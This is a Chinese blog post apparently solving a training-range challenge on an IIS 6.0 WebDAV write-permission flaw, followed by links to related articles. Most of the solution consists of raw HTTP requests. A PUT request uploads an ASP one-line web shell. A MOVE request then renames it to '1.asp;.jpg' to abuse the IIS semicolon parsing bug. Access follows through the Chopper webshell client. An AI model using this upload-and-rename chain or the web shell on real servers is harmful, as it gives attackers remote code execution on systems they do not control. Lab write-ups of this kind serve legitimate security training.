【WEB】IIS写权限漏洞分析溯源

最新推荐文章于 2024-07-11 16:57:04 发布
最新推荐文章于 2024-07-11 16:57:04 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: CTF 文章标签: iis解析漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81837940
版权

【原题】https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe

【解法】

1.首先iis scaner发现有put漏洞,但是无法用工具注入。

2.尝试用burp抓包修改写入 

PUT /test.txt HTTP/1.1
Host: 219.153.49.228:43672
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: close
Content-Length: 23

<%eval request("123")%>

返回207说明成功写入

3.更改一句名称,利用iis漏洞,我们更名为1.asp;.jpg

burp写入

MOVE /test.txt HTTP/1.1
Host: 219.153.49.228:43672
Destination: /1.asp;.jpg
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: close
Content-Length: 23

<%eval request("123")%>

虽然返回207 Multi-Status, 但是这个文件确实可以访问,菜刀连接即可。

pcy190
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
web漏洞之需要准备的工作:信息收集
Miracle_ze的博客
07-24 347
信息收集
墨者_IIS权限漏洞分析溯源
weixin_50698958的博客
10-13 391
靶场: https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe 背景介绍 某日,安全工程师"墨者"对一内网进行授权扫描,在扫描过程中,发现了一台Windows2003的服务器,开启了web服务,业主单位员工坚称是一个调试服务器,只安装了IIS6.0,无任何代码程序,不可能会有安全问题。"墨者"一听就来劲了,拿起工具,手起刀落~~~~~~ 实训目标 1、了解IIS WebDAV安全配置; 2、了解HTT
墨者学院-IIS权限漏洞分析溯源
臭nana的博客
12-18 557
利用burpsuit抓包 发送到repeater 将GET改成OPTIONS 发现Allow部分有PUT和MOVE 然后利用PUT入一句话木马到一个文件里面 利用iis6文件解析漏洞,用MOVE改文件后缀名为.asp;.jpg 菜刀连接 拿到key ...
网络安全-IIS8.0-10.0漏洞复现和修复
最新发布
weixin_65409651的博客
07-11 1931
【代码】网络安全-IIS8.0-10.0漏洞复现和修复。
墨者学院 - IIS权限漏洞分析溯源
多崎巡礼的博客
08-29 1418
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。     iis scan工具链接 链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54 ...
CTF-IIS权限漏洞分析溯源
asd158923328的博客
08-21 695
根据题意 原因:来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 用burp抓包修改入,修改GET为OPTIONS 发现Allow部分有PUT和MOVE 然后利用PUT入一句话木马到一个文件里面 更改或增加以下 PUT ...
IIS6.0解析漏洞
tonghua6的专栏
04-05 697
 IIS解析漏洞式什么?在 Windows 2003 IIS 6.0 下有两个漏洞,微软一直没有给出补丁。   IIS解析漏洞1:   在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。
IIS中间件四大漏洞分析
fansenliangren的博客
12-27 954
关于IIS中间件四大漏洞漏洞原理,漏洞危害,检测条件,检测方法,和修复建议的简要介绍。
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 016-网络安全应急技术与实践(Web层-应急响应技术总结)
热门推荐
时光隧道
02-11 7万+
Web安全事件应急响应技术是指针对Web应用程序遭受风险和安全漏洞的事件,如网络攻击、数据泄露、恶意软件等,迅速采取措施进行监测、分析和应对的技术手段。应急响应技术描述1. 监测和日志分析通过实时监测和分析Web应用程序的日志,以便发现异常活动和潜在的安全威胁。2. 威胁情报收集与分析收集和分析来自多个来源的威胁情报,以帮助识别和应对潜在威胁。3. 漏洞扫描和漏洞管理通过定期对Web应用程序进行漏洞扫描,及时发现和修复潜在的安全漏洞。4. 网络流量分析
IIS权限漏洞
05-03
IIS权限漏洞,discua建须搭知与漏洞不全
IIS权限漏洞工具
10-19
IIS权限漏洞工具 IIS权限漏洞工具
详尽了解IIS服务漏洞与安全性
03-04
我们常在网上看到关于Windows Server 2003 已经非常安全的报道,但是我们的管理员不是每天做个补丁更新的工作吗?其实,Windows Server 2003中给我带来最直接的感觉就是IIS 6的安全性,直到现在为止笔者确实没有发现IIS 6中有什么重大的漏洞可以被黑客利用。工作进程隔离(Worker Process Isolation)以及URL的授权访问,我在以前版本里面根本就没有奢念。不仅如此,最主要的改进就是IIS本身的“默认可用性”和“默认锁定扩展服务”。
IIS的十七个常见安全漏洞
03-03
IIS的十七个常见安全漏洞
Iis权限漏洞认识
weixin_34313182的博客
10-13 185
Iis权限漏洞是由于iis的网站主目录权限设置不当造成的,严格来说不属于iis漏洞。网站主目录设置可权限,可直接往服务器上文件,漏洞威胁级别较高。 漏洞成可利用的条件 1、 网站主目录权限允许入和脚本资源访问。如果只有权限,利用时只能上传txt文件,使用move方法将txt文件改正可执行脚本,需要脚本资源访问权限。 2、 WebDAV服务器扩...
科普文之iis权限漏洞
ccx_john的专栏
07-11 2560
今天特意跑到学校听了一堂课,然后学了很多东西,就一个笔记,分享一下吧。都是本地环境,没有真实环境,我小白,别喷我。 Iis权限漏洞 说明:这个漏洞的产生原因来源于服务器配置不当 演示: 利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持P
IIS权限漏洞加固
我只会装360的博客
12-21 395
简介 IIS作为一款流行的Web服务器,在当今互联网环境中占有很大的比重,绝大多数的asp、asp.net网站都运行在它上面。因此,也引来了无数 黑客们关注的目光。目前针对IIS的攻击技术已经非常成熟,而且相对技术门槛较低,所以很多初学者拿它来练手。许多网站因为网站管理员的安全意识不高或技术上的疏忽而惨遭毒手。 1)WebDAV的作用 WebDAV是一种基于 HTTP 1.1协议的通信协...
IIS权限的利用续以及权限漏洞来由解释
weixin_34166847的博客
01-26 238
目前大家所见到的IIS权限利用,其实说白了是菜鸟管理员对IIS的错误配置问题(2个错误配置造成): 1.WEB服务器扩展里设置WebDAV为允许; 2.网站权限配置里开启了权限。 至于WebDAV,看看百度百科的介绍: WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1...
修复iis解析漏洞_修复典型的iis 10漏洞并进行安全审核
weixin_26636643的博客
08-25 3952
修复iis解析漏洞You will generally be in good shape using IIS 10 to securely host websites, but there are some changes you must make to pass a security audit. 使用IIS 10安全地托管网站通常会保持良好状态,但是必须进行一些更改才能通过安全审核。 Al...
IIS中间件漏洞分析及修复策略
"这篇文档是关于Web中间件常见漏洞的总结,主要针对微软的IIS (Internet Information Services)。文档详细介绍了IIS6.x和IIS7.x版本中的解析漏洞、上传安全问题以及修复建议。" 在Web开发中,中间件扮演着至关重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值